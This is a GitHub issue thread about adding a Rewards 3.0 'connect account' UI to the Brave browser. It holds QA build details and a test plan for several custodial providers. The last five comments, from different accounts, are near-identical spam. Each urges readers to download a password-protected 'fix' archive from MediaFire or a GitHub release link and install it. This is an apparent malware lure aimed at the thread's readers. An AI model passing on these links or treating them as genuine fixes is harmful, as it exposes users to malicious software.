### ISSUE TITLE
[Rewards 3.0] Add connect account UI

### ISSUE THREAD

**Issue by zenparsing** [brave/brave-browser#39876]
### Description

The connect account UI includes the connect account screen and the post-login authorization redirect modal.

**Comment by LaurenWags** [comment]
Verification in progress with

```
Brave	1.70.73 Chromium: 128.0.6613.27 (Official Build) nightly (arm64) 
Revision	f21deb89246b4cb37cfdd6c0c823a49b388d5ac5
OS	macOS Version 14.6.1 (Build 23G93)
```

**Comment by GeetaSarvadnya** [comment]
Verification **INPROGRESS** on

```
Brave | 1.70.88 Chromium: 128.0.6613.85 (Official Build) beta (64-bit)
-- | --
Revision | 7431803bd1e909ef82982df42e2ea7aacbad755e
OS | Windows 10 Version 22H2 (Build 19045.4780)
```
Verified test plan from https://github.com/brave/brave-core/pull/24717#issue-2414637061 for various custodial options: Uphold, Gemini, bitFlyer, ZebPay, and self-custody.

<details>
<summary>Uphold - InProgress</summary>

Case 1 - Join from panel
1. Clean profile 1.70.x.
2. Enable the Rewards 3.0 flag: #brave-rewards-new-rewards-ui (Show the new Rewards UI).
3. Relaunch as needed.
4. Enable Rewards.
5. On rewards panel, press the "Connect account" button.
6. Confirm that brave://rewards page is opened to verify screen
7. Verify that connect account screen is displayed with the correct options.
8. Select the custodial provider and complete the provider login flow.
9. Ensure that user is in the connected state after login flow is completed.

Case 2 - Join from brave://rewards page
1. Clean profile 1.70.x.
2. Enable the Rewards 3.0 flag: #brave-rewards-new-rewards-ui (Show the new Rewards UI).
3. Relaunch as needed.
4. Enable Rewards.
5. On the brave://rewards page, press the "Connect account" button.
6. Verify that connect account screen is displayed with the correct options.
7. Select the custodial provider and complete the provider login flow.
8. Ensure that user is in the connected state after login flow is completed.

Case 3 - Join from NTP widget
1. Clean profile 1.70.x.
2. Enable the Rewards 3.0 flag: #brave-rewards-new-rewards-ui (Show the new Rewards UI).
3. Relaunch as needed.
4. Enable Rewards.
5. On the NTP widget, press the "Connect account" button.
6. Confirm that brave://rewards page is opened to verify screen
7. Verify that connect account screen is displayed with the correct options.
8. Select the custodial provider and complete the provider login flow.
9. Ensure that user is in the connected state after login flow is completed.

</details>

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
